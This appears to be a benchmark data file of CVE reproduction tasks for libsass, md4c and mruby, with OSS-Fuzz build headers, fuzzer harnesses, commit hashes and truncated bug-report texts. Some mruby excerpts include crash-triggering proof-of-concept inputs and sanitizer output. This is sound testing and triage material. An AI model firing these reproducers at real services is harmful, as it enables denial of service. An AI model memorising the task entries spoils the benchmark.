# Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src
[ { "filename": "data_context_fuzzer.cc", "content": "#include \"sass.h\"\n\nextern \"C\" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {\n char* sass_data = (char*) malloc(sizeof(char) * size + 1);\n if (sass_data == NULL) return 0;\n\n memcpy(sass_data, data, size);\n sass_data[size] = '\...
libsass.cve-2018-11694
sass/libsass
60f839158eff1f1bb84cb44f0f0c4bce3ed86a6d
https://github.com/sass/libsass/issues/2663
c++
From https://github.com/sass/libsass/issues/2663: From https://github.com/sass/libsass/issues/2663: Issue Title: AddressSanitizer: null pointer dereference (SEGV) in Sass::Functions::selector_append (libsass/src/functions.cpp:2088:13) Issue Body: Hey there, I have discovered a null pointer dereference in libsass at: [...
#!/bin/bash -eu # Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src
[ { "filename": "data_context_fuzzer.cc", "content": "#include \"sass.h\"\n\nextern \"C\" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {\n char* sass_data = (char*) malloc(sizeof(char) * size + 1);\n if (sass_data == NULL) return 0;\n\n memcpy(sass_data, data, size);\n sass_data[size] = '\...
libsass.cve-2018-11695
sass/libsass
60f839158eff1f1bb84cb44f0f0c4bce3ed86a6d
https://github.com/sass/libsass/issues/2664
c++
From https://github.com/sass/libsass/issues/2664: From https://github.com/sass/libsass/issues/2664: Issue Title: AddressSanitizer: null pointer dereference (SEGV) in Sass::Expand::operator (libsass/src/expand.cpp:249:28) Issue Body: Hey there, I have discovered a null pointer dereference in libsass at: [expand.cpp:249...
#!/bin/bash -eu # Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src
[ { "filename": "data_context_fuzzer.cc", "content": "#include \"sass.h\"\n\nextern \"C\" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {\n char* sass_data = (char*) malloc(sizeof(char) * size + 1);\n if (sass_data == NULL) return 0;\n\n memcpy(sass_data, data, size);\n sass_data[size] = '\...
libsass.cve-2018-11696
sass/libsass
60f839158eff1f1bb84cb44f0f0c4bce3ed86a6d
https://github.com/sass/libsass/issues/2665
c++
From https://github.com/sass/libsass/issues/2665: From https://github.com/sass/libsass/issues/2665: Issue Title: AddressSanitizer: null pointer dereference (SEGV) in Sass::Inspect::operator (libsass/src/inspect.cpp:1060:9) Issue Body: Hey there, I have discovered a null pointer dereference in libsass at: [inspect.cpp:...
#!/bin/bash -eu # Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src
[ { "filename": "data_context_fuzzer.cc", "content": "#include \"sass.h\"\n\nextern \"C\" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {\n char* sass_data = (char*) malloc(sizeof(char) * size + 1);\n if (sass_data == NULL) return 0;\n\n memcpy(sass_data, data, size);\n sass_data[size] = '\...
libsass.cve-2018-11697
sass/libsass
60f839158eff1f1bb84cb44f0f0c4bce3ed86a6d
https://github.com/sass/libsass/issues/2656
c++
From https://github.com/sass/libsass/issues/2656: From https://github.com/sass/libsass/issues/2656: Issue Title: AddressSanitizer: heap-buffer-overflow (OOB read) in Sass::Prelexer::exactly (libsass/src/lexer.hpp:93:14) Issue Body: Hey there, I have discovered an out-of-bands read (OOB) in libsass at: [libsass/src/lex...
#!/bin/bash -eu # Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src
[ { "filename": "data_context_fuzzer.cc", "content": "#include \"sass.h\"\n\nextern \"C\" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {\n char* sass_data = (char*) malloc(sizeof(char) * size + 1);\n if (sass_data == NULL) return 0;\n\n memcpy(sass_data, data, size);\n sass_data[size] = '\...
libsass.cve-2018-11698
sass/libsass
60f839158eff1f1bb84cb44f0f0c4bce3ed86a6d
https://github.com/sass/libsass/issues/2662
c++
From https://github.com/sass/libsass/issues/2662: From https://github.com/sass/libsass/issues/2662: Issue Title: AddressSanitizer: heap-buffer-overflow (OOB read) in Sass::handle_error (libsass/src/sass_context.cpp:85:28) Issue Body: Hey there, I have discovered a single byte out-of-bands read (OOB) in libsass at: [sa...
#!/bin/bash -eu # Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src
[ { "filename": "data_context_fuzzer.cc", "content": "#include \"sass.h\"\n\nextern \"C\" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {\n char* sass_data = (char*) malloc(sizeof(char) * size + 1);\n if (sass_data == NULL) return 0;\n\n memcpy(sass_data, data, size);\n sass_data[size] = '\...
libsass.cve-2022-43357
sass/libsass
2102188d21d2b7577c2b3edb12832e90786a2831
https://github.com/sass/libsass/issues/3177
c++
From https://github.com/sass/libsass/issues/3177: Issue Title: A stack-overflow src/ast_selectors.cpp:557 in Sass::CompoundSelector::has_real_parent_ref() const Issue Body: ### **1. Description** A stack-overflow has occurred in `Sass::CompoundSelector::has_real_parent_ref()` of `src/ast_selectors.cpp:557` when runn...
#!/bin/bash -eu # Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src
[ { "filename": "data_context_fuzzer.cc", "content": "#include \"sass.h\"\n\nextern \"C\" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {\n char* sass_data = (char*) malloc(sizeof(char) * size + 1);\n if (sass_data == NULL) return 0;\n\n memcpy(sass_data, data, size);\n sass_data[size] = '\...
libsass.cve-2022-43358
sass/libsass
2102188d21d2b7577c2b3edb12832e90786a2831
https://github.com/sass/libsass/issues/3178
c++
From https://github.com/sass/libsass/issues/3178: Issue Title: AddressSanitizer: stack-overflow src/ast_selectors.cpp:464 in Sass::ComplexSelector::has_placeholder() const Issue Body: ### **1. Description** A stack-overflow has occurred in `Sass::ComplexSelector::has_placeholder()` of `src/ast_selectors.cpp:464` wh...
#!/bin/bash -eu # Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src
[ { "filename": "data_context_fuzzer.cc", "content": "#include \"sass.h\"\n\nextern \"C\" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {\n char* sass_data = (char*) malloc(sizeof(char) * size + 1);\n if (sass_data == NULL) return 0;\n\n memcpy(sass_data, data, size);\n sass_data[size] = '\...
libsass.cve-2018-19838
sass/libsass
45f50873962b7d1c66bd115ba6e644bdaaf6cac1
https://github.com/sass/libsass/issues/2660
c++
From https://github.com/sass/libsass/issues/2660: From https://github.com/sass/libsass/issues/2660: From https://github.com/sass/libsass/issues/2660: Issue Title: AddressSanitizer: stack-overflow at IMPLEMENT_AST_OPERATORS expansion Issue Body: We found with our fuzzer some stack over flow errors when executing on `IM...
#!/bin/bash -eu # Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src
[ { "filename": "data_context_fuzzer.cc", "content": "#include \"sass.h\"\n\nextern \"C\" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {\n char* sass_data = (char*) malloc(sizeof(char) * size + 1);\n if (sass_data == NULL) return 0;\n\n memcpy(sass_data, data, size);\n sass_data[size] = '\...
libsass.cve-2018-19839
sass/libsass
45f50873962b7d1c66bd115ba6e644bdaaf6cac1
https://github.com/sass/libsass/issues/2657
c++
From https://github.com/sass/libsass/issues/2657: From https://github.com/sass/libsass/issues/2657: From https://github.com/sass/libsass/issues/2657: Issue Title: AddressSanitizer: buffer-overflow (OOB read) against some invalid input (sass_context.cpp:81) Issue Body: We found with our fuzzer some buffer over flow err...
#!/bin/bash -eu # Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src
[ { "filename": "data_context_fuzzer.cc", "content": "#include \"sass.h\"\n\nextern \"C\" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {\n char* sass_data = (char*) malloc(sizeof(char) * size + 1);\n if (sass_data == NULL) return 0;\n\n memcpy(sass_data, data, size);\n sass_data[size] = '\...
libsass.cve-2018-20821
sass/libsass
45f50873962b7d1c66bd115ba6e644bdaaf6cac1
https://github.com/sass/libsass/issues/2658
c++
From https://github.com/sass/libsass/issues/2658: From https://github.com/sass/libsass/issues/2658: From https://github.com/sass/libsass/issues/2658: Issue Title: AddressSanitizer: stack-overflow when creating String_Schema_Obj (parser.cpp:1808) Issue Body: We found with our fuzzer some stack over flow errors when con...
#!/bin/bash -eu # Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src
[ { "filename": "data_context_fuzzer.cc", "content": "#include \"sass.h\"\n\nextern \"C\" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {\n char* sass_data = (char*) malloc(sizeof(char) * size + 1);\n if (sass_data == NULL) return 0;\n\n memcpy(sass_data, data, size);\n sass_data[size] = '\...
libsass.cve-2018-20822
sass/libsass
45f50873962b7d1c66bd115ba6e644bdaaf6cac1
https://github.com/sass/libsass/issues/2671
c++
From https://github.com/sass/libsass/issues/2671: From https://github.com/sass/libsass/issues/2671: From https://github.com/sass/libsass/issues/2671: Issue Title: AddressSanitizer: stack-overflow at Sass::Inspect::operator() (inspect.cpp:977) Issue Body: We found with our fuzzer some stack over flow errors at Sass::In...
#!/bin/bash -eu # Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src
[ { "filename": "data_context_fuzzer.cc", "content": "#include \"sass.h\"\n\nextern \"C\" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {\n char* sass_data = (char*) malloc(sizeof(char) * size + 1);\n if (sass_data == NULL) return 0;\n\n memcpy(sass_data, data, size);\n sass_data[size] = '\...
libsass.cve-2019-18798
sass/libsass
4da7c4bd13b8e9e5cd034f358dceda0bbba917d2
https://github.com/sass/libsass/issues/2999
c++
From https://github.com/sass/libsass/issues/2999: From https://github.com/sass/libsass/issues/2999: From https://github.com/sass/libsass/issues/2999: Issue Title: Heap Buffer Overflow in sassc Issue Body: We found Heap Buffer Overflow in sassc binary and sassc is complied with clang enabling ASAN. **Machine Setup** `...
#!/bin/bash -eu # Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src
[ { "filename": "data_context_fuzzer.cc", "content": "#include \"sass.h\"\n\nextern \"C\" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {\n char* sass_data = (char*) malloc(sizeof(char) * size + 1);\n if (sass_data == NULL) return 0;\n\n memcpy(sass_data, data, size);\n sass_data[size] = '\...
libsass.cve-2019-18799
sass/libsass
4da7c4bd13b8e9e5cd034f358dceda0bbba917d2
https://github.com/sass/libsass/issues/3001
c++
From https://github.com/sass/libsass/issues/3001: From https://github.com/sass/libsass/issues/3001: From https://github.com/sass/libsass/issues/3001: Issue Title: SEGV in sassc Issue Body: We found SEGV in sassc binary and sassc is complied with clang enabling ASAN. **Machine Setup** ``` Machine : Ubuntu 16.04.3 LTS ...
#!/bin/bash -eu # Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src
[ { "filename": "data_context_fuzzer.cc", "content": "#include \"sass.h\"\n\nextern \"C\" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {\n char* sass_data = (char*) malloc(sizeof(char) * size + 1);\n if (sass_data == NULL) return 0;\n\n memcpy(sass_data, data, size);\n sass_data[size] = '\...
md4c.cve-2020-26148
mity/md4c
22ca89a3008966c4316d6b0a158b1a49f9038df0
https://github.com/mity/md4c/issues/130
c++
From https://github.com/mity/md4c/issues/130: Issue Title: Use of uninitialized value in the md_push_block_bytes() function Issue Body: Hi, While fuzzing md4c 0.4.5 with Honggfuzz, I found out that the md_push_block_bytes() function may use uninitialized memory. Attaching a reproducer (gzipped so GitHub accepts it):...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/md4c
[]
md4c.cve-2021-30027
mity/md4c
4fc808d8fe8d8904f8525bb4231d854f45e23a19
https://github.com/mity/md4c/issues/155
c++
From https://github.com/mity/md4c/issues/155: From https://github.com/mity/md4c/issues/155: From https://github.com/mity/md4c/issues/155: Issue Title: Use of uninitialized value in the md_analyze_line() function Issue Body: Hi, While fuzzing md4c 0.4.7 with AFL++ and MSAN, I found out that the md_analyze_line() funct...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/md4c
[]
md4c.cve-2018-11536
mity/md4c
81e2a5cac2c8c2b1f8fe63b7bce3fe7e516e2891
https://github.com/mity/md4c/issues/36
c++
From https://github.com/mity/md4c/issues/36: Issue Title: Multiple vulnerabilities in md4c Issue Body: # Multiple vulnerabilities in md4c There are multiple vulnerabilities in md4c (git repository: https://github.com/mity/md4c, Latest commit 81e2a5c on Apr 12, 2018). git log commit 81e2a5cac2c8c2b1f8fe63b7bce3...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/md4c
[]
mruby.cve-2018-12249
mruby/mruby
faa4eaf6803bd11669bc324b4c34e7162286bfa3
https://github.com/mruby/mruby/issues/4037
c++
From https://github.com/mruby/mruby/issues/4037: From https://github.com/mruby/mruby/issues/4037: Issue Title: Null pointer dereference in mrb_class_real Issue Body: The following input demonstrates a crash: ```ruby BasicObject.prepend Enumerable class BasicObject < Class end ``` ASAN report: ``` ASAN:DEADLYSIGNAL ==...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/mruby
[]
mruby.cve-2018-14337
mruby/mruby
351614bbddb5f612ecf9572e975e78e058d2bf11
https://github.com/mruby/mruby/issues/4062
c++
From https://github.com/mruby/mruby/issues/4062: From https://github.com/mruby/mruby/issues/4062: Issue Title: Signed integer overflow in mrb_str_format Issue Body: The check macro (in `/mrbgems/mruby-sprintf/src/sprintf.c`) contains an signed integer overflow in `bsize`: ```c #define CHECK(l) do {\ /* int cr = ENC_...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/mruby
[]
mruby.cve-2021-4110
mruby/mruby
f5e10c5a79a17939af763b1dcf5232ce47e24a34
https://huntr.dev/bounties/4ce5dc47-2512-4c87-8609-453adc8cad20
c++
From https://huntr.dev/bounties/4ce5dc47-2512-4c87-8609-453adc8cad20: Description NULL Pointer Dereference in mrb_full_gc Proof of Concept ( *a = () ) a.<<.take_while{ a.drop_while {Enumerable ; a<<lambda {}}} Result ./master/asan_mruby/bin/mirb ./crash.rb mirb - Embeddable Interactive Ruby Shell => nil AddressSaniti...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/mruby
[]
mruby.cve-2022-0240
mruby/mruby
171d32c0071d776207174a40a8fa26def3dbb931
https://huntr.dev/bounties/5857eced-aad9-417d-864e-0bdf17226cbb
c++
From https://huntr.dev/bounties/5857eced-aad9-417d-864e-0bdf17226cbb: Description There is a NULL Pointer Dereference in prepare_singleton_class (src/class.c:360:13). This bug has been found on mruby lastest commit (hash 171d32c0071d776207174a40a8fa26def3dbb931) on Ubuntu 20.04 for x86_64/amd64. Proof of Concept 1.time...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/mruby
[]
mruby.cve-2022-0481
mruby/mruby
00f2b74ab2c1f03084908c815dcd0934f9fc702a
https://huntr.dev/bounties/54725c8c-87f4-41b6-878c-01d8e0ee7027
c++
From https://huntr.dev/bounties/54725c8c-87f4-41b6-878c-01d8e0ee7027: Description There is a NULL Pointer Dereference in iv_free (src/variable.c:232:20). This bug has been found on mruby lastest commit (hash 00f2b74ab2c1f03084908c815dcd0934f9fc702a) on Ubuntu 20.04 for x86_64/amd64. Proof of Concept 3.times{e=0,"#{* =c...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/mruby
[]
mruby.cve-2022-0630
mruby/mruby
ecb28f4bf463483cf914c799d086b0cfff997aee
https://huntr.dev/bounties/f7cdd680-1a7f-4992-b4b8-44b5e4ba3e32
c++
From https://huntr.dev/bounties/f7cdd680-1a7f-4992-b4b8-44b5e4ba3e32: Description commit ecb28f4bf463483cf914c799d086b0cfff997aee Proof of Concept ⚡ root@pocas  ~/fuzz/mruby2   master ±  echo "P2MKWyoqMCwqKjgsbTowXQSAPRpbAAB7" | base64 -d > poc1 ⚡ root@pocas  ~/fuzz/mruby2   master ±  ./bin/mruby poc1 AddressSa...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/mruby
[]
mruby.cve-2022-1071
mruby/mruby
aaa28a508903041dd7399d4159a8ace9766b022f
https://huntr.dev/bounties/6597ece9-07af-415b-809b-919ce0a17cf3
c++
From https://huntr.dev/bounties/6597ece9-07af-415b-809b-919ce0a17cf3: While fuzzing mruby I found a use after free in mruby compiled with ASAn. Proof of Concept (uaf1.rb) var1 = -0 var2 = 1.0 var3 = 1 var4 = +0 var3 = methods.group_by() { || var3 = methods.group_by() { || var3 = methods.group_by() { || var3...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/mruby
[]
mruby.cve-2022-1427
mruby/mruby
791635a8d1ad9aad98aae0a36a91e092e4d71944
https://huntr.dev/bounties/23b6f0a9-64f5-421e-a55f-b5b7a671f301
c++
From https://huntr.dev/bounties/23b6f0a9-64f5-421e-a55f-b5b7a671f301: Out-of-bounds Read in mrb_obj_is_kind_of in mruby/mruby Affected commit 791635a8d1ad9aad98aae0a36a91e092e4d71944 Proof of Concept Math.initialize() do $4 prepend dup 4.instance_exec(){|| super() } end Below is the output from mruby ASAN build: ...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/mruby
[]
mruby.cve-2022-1934
mruby/mruby
ac79849fde3381e001c3274fbcdda20a5c9cb22b
https://huntr.dev/bounties/99e6df06-b9f7-4c53-a722-6bb89fbfb51f
c++
From https://huntr.dev/bounties/99e6df06-b9f7-4c53-a722-6bb89fbfb51f: Description Use-After-Free in function hash_new_from_values at vm.c:1167 mruby version git log commit ac79849fde3381e001c3274fbcdda20a5c9cb22b (HEAD -> master, origin/master, origin/HEAD) Author: Yukihiro "Matz" Matsumoto <matz@ruby.or.jp> Date: Fr...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/mruby
[]
mruby.cve-2017-9527
mruby/mruby
e2e2edae51f33ef5ff164c60ed57e1466d1edaea
https://github.com/mruby/mruby/issues/3486
c++
From https://github.com/mruby/mruby/issues/3486: Issue Title: Heap use-after-free in mark_context_stack Issue Body: The following input to mruby demonstrates a heap use-after-free bug: [208363.txt](https://github.com/mruby/mruby/files/825358/208363.txt) To demonstrate, build with clang & ASAN (`CFLAGS="-fsanitize=add...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/mruby
[]
mruby.cve-2022-0326
mruby/mruby
31fa3304049fc406a201a72293cce140f0557dca
https://huntr.dev/bounties/795dcbd9-1695-44bb-8c59-ad327c97c976
c++
From https://huntr.dev/bounties/795dcbd9-1695-44bb-8c59-ad327c97c976: Description There is a NULL Pointer Dereference in iv_free (src/variable.c:232:20). This bug has been found on mruby lastest commit (hash 31fa3304049fc406a201a72293cce140f0557dca) on Ubuntu 20.04 for x86_64/amd64. Proof of Concept 6.times{3.times{%]#...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
